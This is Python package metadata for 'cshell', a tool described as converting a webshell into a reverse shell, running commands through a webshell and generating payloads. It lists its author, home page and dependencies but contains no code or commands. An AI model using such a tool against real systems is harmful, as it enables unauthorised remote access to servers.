Metadata-Version: 2.1
Name: cshell
Version: 1.5.1
Summary: A command line tool to transfer transfer a webshell into a reverse shell, execute command directly into the webshell, genrating payload
Home-page: https://github.com/0z09e/cshell
Author: Sourav Sen
Author-email: 0z09e.o3@gmail.com
License: UNKNOWN
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: GNU General Public License v2 (GPLv2)
Requires-Dist: IPy
Requires-Dist: lolcat
Requires-Dist: pyperclip
Requires-Dist: requests
